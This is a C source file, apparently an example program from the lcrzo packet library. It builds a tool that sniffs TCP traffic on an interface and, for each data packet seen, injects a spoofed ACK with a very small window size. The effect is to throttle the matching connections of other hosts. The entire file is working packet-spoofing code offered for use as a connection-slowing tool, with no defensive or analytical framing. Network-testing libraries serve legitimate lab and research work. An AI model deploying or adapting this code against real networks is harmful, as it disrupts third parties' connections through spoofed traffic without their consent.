
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000371=
{ /*reference*/     "lcrzoex", 371,
  /*version*/       1, 0,
  /*title*/         "send a packet with a small TCP Window for every sniffed TCP packet",
  /*french title*/  "envoie un paquet avec une petite Window TCP pour tous les paquets TCP sniffes",
  /*description*/   "This tool can be used to slow down a TCP connection",
  /*french desc.*/  "Cet outil peut etre employe pour ralentir une connexion TCP",
  /*usage*/         "window device [\"bpf_filter\"]",
  /*french usage*/  "window device [\"filtre_bpf\"]",
  /*usage example*/ "8 eth0 \"tcp and net 1.2.3.0/24\"",
  /*fr. usage ex.*/ "8 eth0 \"tcp and net 1.2.3.0/24\"",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declaration */
int lcrzoex_000371_main(int argc, char *argv[]);
int lcrzoex_000371_tcpslow(lcrzo_data data, 
			   lcrzo_int32 datasize,
			   lcrzo_device device,
			   lcrzo_uint16 window);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000371_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_uint32 mtu;
  lcrzo_sniff sniff;
  lcrzo_data sniffdata;
  lcrzo_int32 sniffdatasize;
  lcrzo_string snifffilter;
  lcrzo_uint16 window;
  int ret;

  lcrzo_init();
  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000371, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize window value */
  lcrzo_epr(lcrzo_uint16_init_text(argv[1], &window));

  /* initialize device and mtu */
  lcrzo_epr(shared_para_device_init_src(argv[2], device));
  lcrzo_epr(lcrzo_mtu_init_device(device, &mtu));

  /* init sniff */
  if (argc<=3)
  { lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_NORMAL,
			       "tcp", &sniff));
  }
  else
  { lcrzo_epr(shared_para_string_init_snifffilter(argv[3], &snifffilter));
    lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_NORMAL, 
			       snifffilter, &sniff));
    lcrzo_epr(lcrzo_string_free2(&snifffilter));
  }

  /* main loop */
  ret=LCRZO_ERR_OK; /* just for the compiler warning */
  while (LCRZO_TRUE)
  { /* sniff next packet */
    ret=lcrzo_sniff_nextm(&sniff, LCRZO_WAIT_INFINITE, 
			&sniffdata, &sniffdatasize);
    if (ret!=LCRZO_ERR_OK) break;
    /*lcrzo_packet_print_eth(sniffdata, sniffdatasize,
                             LCRZO_PRINTPROFILE_SYNTHSYNTH);*/
    /* now, we slow every TCP connection */
    ret=lcrzoex_000371_tcpslow(sniffdata, sniffdatasize, device, window);
    if (ret!=LCRZO_ERR_OK) break;
    lcrzo_epr(lcrzo_data_free2(&sniffdata));
  }

  /* close everything */
  lcrzo_epr(lcrzo_sniff_close(&sniff));
  lcrzo_epr(lcrzo_err_print(ret));
  lcrzo_close();
  return (ret);
}

/*-------------------------------------------------------------*/
int lcrzoex_000371_tcpslow(lcrzo_data data, 
			   lcrzo_int32 datasize,
			   lcrzo_device device,
			   lcrzo_uint16 window)
{ lcrzo_hdrleth recv_hdreth, send_hdreth;
  lcrzo_hdrlip  recv_hdrip,  send_hdrip;
  lcrzo_hdrltcp recv_hdrtcp, send_hdrtcp;
  lcrzo_spoof spoof;
  lcrzo_uint16 tcpdatasize;
  int ret;

  /* try to decode tcp */
  ret=lcrzo_packet_decodem_ethipopttcpoptdata(data, datasize, &recv_hdreth,
					      &recv_hdrip, NULL, NULL,
					      &recv_hdrtcp, NULL, NULL, 
					      NULL, &tcpdatasize);
  if ( ret!=LCRZO_ERR_OK )
    return(LCRZO_ERR_OK);

  /* do not answer to syn, reset or fin */
  if ( recv_hdrtcp.syn || recv_hdrtcp.fin || recv_hdrtcp.rst )
    return(LCRZO_ERR_OK);

  /* also, we choose to ignore packets with a smaller window */
  if ( recv_hdrtcp.window <= window )
    return(LCRZO_ERR_OK);

  /* create the new Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&send_hdreth));
  memcpy(send_hdreth.src, recv_hdreth.dst, LCRZO_ETHA_MAXBYTES);
  memcpy(send_hdreth.dst, recv_hdreth.src, LCRZO_ETHA_MAXBYTES);

  /* create the new IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&send_hdrip));
  send_hdrip.saddr=recv_hdrip.daddr;
  send_hdrip.daddr=recv_hdrip.saddr;

  /* create the new TCP header */
  lcrzo_epr(lcrzo_hdrltcp_initdefault(&send_hdrtcp));
  send_hdrtcp.ack=LCRZO_TRUE;
  send_hdrtcp.window=window;
  send_hdrtcp.seqnum=recv_hdrtcp.acknum;
  send_hdrtcp.acknum=recv_hdrtcp.seqnum+tcpdatasize;
  send_hdrtcp.sport=recv_hdrtcp.dport;
  send_hdrtcp.dport=recv_hdrtcp.sport;

  /* send packet */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_FALSE));
  lcrzo_epr(lcrzo_spoof_set_printprofile(&spoof, 
					 LCRZO_PRINTPROFILE_SYNTHSYNTH));
  lcrzo_epr(lcrzo_spoof_ethipopttcpoptdata(&spoof, device, send_hdreth, 
					   send_hdrip, NULL, 0,
					   send_hdrtcp, NULL, 0,
					   NULL, 0));
  lcrzo_epr(lcrzo_spoof_close(&spoof));
  return (LCRZO_ERR_OK);
}
